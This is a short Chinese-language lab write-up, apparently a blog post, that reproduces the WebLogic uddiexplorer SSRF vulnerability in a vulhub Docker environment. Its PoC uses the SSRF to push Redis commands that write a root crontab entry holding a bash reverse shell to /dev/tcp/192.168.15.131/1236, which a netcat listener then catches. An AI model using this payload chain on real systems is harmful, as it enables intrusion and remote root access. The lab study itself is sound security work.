0x01 环境搭建
我这里使用的是vulhub,它几乎包含了所有的漏洞环境。(建议安装在ubuntu上)
有需要的小伙伴来企鹅群自取。
安装好vulhub之后需要cd 到weblogic ssrf 目录下
然后启动测试环境
docker-compose build
docker-compose up -d
此次环境搭建在Ubuntu上
0x02 漏洞简介
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
0x03 影响版本
weblogic版本10.0.2
weblogic 版本10.3.6
0x04 漏洞复现
访问http://虚拟机-ip:7001/uddiexplorer/
抓包,发送到重放
查看Ubuntu -redis 的ip
然后改包
Poc:
http://172.18.0.2:6379/test set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.15.131/1236 0>&1nnnn" config set dir /etc/ config set dbfilename crontab save aaa
然后发包,
此时继续打开Ubuntu 使用nc反弹shell
也可以使用其他虚拟机来弹shell,具体姿势还没研究,
研究过的小伙伴可以告告我呦